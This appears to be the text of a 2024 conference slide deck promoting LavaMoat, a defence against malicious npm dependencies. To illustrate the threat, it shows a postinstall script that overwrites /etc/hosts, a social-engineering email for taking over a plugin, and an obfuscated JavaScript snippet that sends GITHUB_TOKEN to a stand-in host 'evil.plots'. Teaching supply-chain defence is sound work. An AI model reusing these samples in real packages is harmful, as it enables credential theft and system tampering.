I'm running code from the internet!


LavaMoat

@naugtur, 2024

Who's that guy?

https://naugtur.pl

npm logo gobble
Put your malicious code in a package and people will gobble it up like cookies.
## Story time

Let's install some dependencies!

Ok, catch this: 📦

I'm not runing that.

That's what you think.

npm docs for lifecycle scripts

            "postinstall": "echo 💩 > /etc/hosts"
        
### Ok, wait ``` ✨🐋 npm ci cp node_modules s3:// 🔥🔥🐋🔥🔥 ```

Hold my 🍺


├─app.ts
├─node_modules
│ ├─@naugtur
│ │ └─evilpackage
| │   ├─evilPlots.js --,
| │   └─package.json   |
│ └─typescript         💩
│   ├─lib              |
│   | └─tsc.js <-------'
│   └─package.json
└─package.json
        
## ignore scripts ``` npm ci --ignore-scripts ``` Run selected scritps ``` npm rebuild bcrypt ```
# Oh 💩
#### look what I found! ![lavamoat](./lavamoat-logo.png)

And in that moment
the installation process was protected

#### let's get serious > Dear ${ eslintPluginMaintainer }, > I understand you're busy and I'd be happy to help with maintenance of your tiny but popular plugin...
#### ok, just in case you do ``` const _0x765e5=_0x46a0;(function(_0x57764e,_0x91aa41){const _0x32405d=_0x46a0,_0x165444=_0x57764e();while(!![]){try{const _0x42ba82=-parseInt(_0x32405d(0x150))/0x1*(parseInt(_0x32405d(0x15e))/0x2)+-parseInt(_0x32405d(0x153))/0x3*(-parseInt(_0x32405d(0x14f))/0x4)+parseInt(_0x32405d(0x159))/0x5*(-parseInt(_0x32405d(0x158))/0x6)+parseInt(_0x32405d(0x151))/0x7*(-parseInt(_0x32405d(0x152))/0x8)+parseInt(_0x32405d(0x157))/0x9+-parseInt(_0x32405d(0x15f))/0xa+parseInt(_0x32405d(0x15a))/0xb; if(_0x42ba82===_0x91aa41)break;else _0x165444['push'](_0x165444['shift']());}catch(_0x54f92f){_0x165444['push'](_0x165444['shift']());}}}(_0x3641,0x8e73e));function _0x3641() {const _0x5d9864=['/stolen/','evil.plots','2511378rgvTaf','5826vwOBSz','3845SrYtZx', '37351105uFQfso','request','end','https','72326kmzepu','8558100KDxwfw', 'GITHUB_TOKEN','25432JwBMWs','29XqXcpt','4547823ytmFVF','8EFXBHJ','99iKrczU','env']; _0x3641=function(){return _0x5d9864;};return _0x3641();}function _0x46a0(_0x24c0cb,_0x27294c){const _0x3641a1=_0x3641();return _0x46a0=function(_0x46a08f,_0x225127){_0x46a08f=_0x46a08f-0x14f;let _0x16a89a=_0x3641a1[_0x46a08f];return _0x16a89a;}, _0x46a0(_0x24c0cb,_0x27294c);}const credentials=process[_0x765e5(0x154)][_0x765e5(0x160)],req=require(_0x765e5(0x15d))[_0x765e5(0x15b)]({'hostname':_0x765e5(0x156),'path':_0x765e5(0x155)+credentials},()=>{});req[_0x765e5(0x15c)](); ```
#### should I keep going? ![](./ilus/obfuscated.png)
#### yo, there's an app for that! ![lavamoat](./lavamoat-logo.png)
# how ?! ![](./ilus/hacker3.png)
### what's inside? ![lavamoat](./lavamoat-underthe.png)
### There's also a bundler 1. browserify based 2. webpack plugin (in BETA) https://lavamoat.github.io

I'll help you set up LavaMoat in your project

@naugtur   naugtur.pl

naugtur.pl/training